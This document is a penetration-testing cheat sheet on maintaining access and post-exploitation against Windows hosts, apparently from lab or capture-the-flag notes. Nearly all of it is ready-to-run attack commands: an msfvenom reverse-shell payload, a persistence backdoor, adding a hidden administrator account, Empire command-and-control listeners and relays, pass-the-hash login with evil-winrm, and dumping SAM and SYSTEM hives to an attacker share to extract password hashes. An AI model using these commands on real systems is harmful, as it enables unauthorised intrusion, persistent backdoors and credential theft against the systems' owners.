Maintaining Access

Generating a Payload w/ msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o shell.exe

use exploit/multi/handler

Background the meterpreter shell

Run the Persistence Module

use exploit/windows/local/persistence

set session 1

If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit multi handler and setting the payload to windows/meterpreter/reverse_tcp allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.

Add a user

net user hacker password123 /add

Next we add our newly created account in the "Administrators" and "Remote Management Users" groups:

net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add

RDP

xfreerdp /v:IP /u:USERNAME /p:PASSWORD

These switches are particularly useful:

  • /dynamic-resolution -- allows us to resize the window, adjusting the resolution of the target in the process
  • /size:WIDTHxHEIGHT -- sets a specific size for targets that don't resize automatically with /dynamic-resolution
  • +clipboard -- enables clipboard support
  • /drive:LOCAL_DIRECTORY,SHARE_NAME -- creates a shared drive between the attacking machine and the target. This switch is insanely useful as it allows us to very easily use our toolkit on the remote target, and save any outputs back directly to our own hard drive. In essence, this means that we never actually have to create any files on the target. For example, to share the current directory in a share called share, you could use: /drive:.,share, with the period (.) referring to the current directory

When creating a shared drive, this can be accessed either from the command line as \\tsclient\, or through File Explorer under "This PC":

xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Empire

sudo apt install powershell-empire starkiller

sudo powershell-empire server

powershell-empire client

starkiller (emprieadmin:password123)

Client

uselistener http
set Name CLIHTTP
set Host IP
set Port 8000
execute
back or main

List and kill listeners

listeners

kill LISTENER_NAME

Create stager multi/bash

Empire Hop Listeners

uselistener http_hop

Specifically we need:

  • A RedirectListener -- this is a regular listener to forward any received agents to. Think of the hop listener as being something like a relay on the compromised server; we still need to catch it with something! You could use the listener you set up earlier for this, or create an entirely new HTTP listener using the same steps we used earlier. Make sure that this matches up with the name of an already active listener though!
  • A Host -- the IP of the compromised webserver (.200).
  • A Port -- this is the port which will be used for the webserver hosting our hop files. Pick a random port here (above 15000), but remember it!

Empire Modules

usemodule powershell/privesc/sherlock

Evil-winrm

Share folder in memory

evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 10.200.198.150 -s ./tools/Pivoting/Windows/

Upload file

upload /usr/share/windows-binaries/nc.exe c:\windows\temp\nc.exe

Exfiltration Techniques & Post Exploitation

Local user hashes are stored in the Windows Registry whilst the computer is running -- specically in the HKEY_LOCAL_MACHINE\SAM hive. This can also be found as a file at C:\Windows\System32\Config\SAM, however, this should not be readable whilst the computer is running. To dump the hashes locally, we first need to save the SAM hive:

reg.exe save HKLM\SAM sam.bak

This saves the hive as a file called "sam.bak" in the current directory.

Dumping the SAM hive isn't quite enough though -- we also need the SYSTEM hive which contains the boot key for the machine:

reg.exe save HKLM\SYSTEM system.bak

Transfer the files over SMB for example

reg.exe save HKLM\SAM \ATTACKING_IP\share\sam.bak

Retrieve the hashes

python3 /opt/impacket/examples/secretsdump.py -sam PATH/TO/SAM_FILE -system PATH/TO/SYSTEM_FILE LOCAL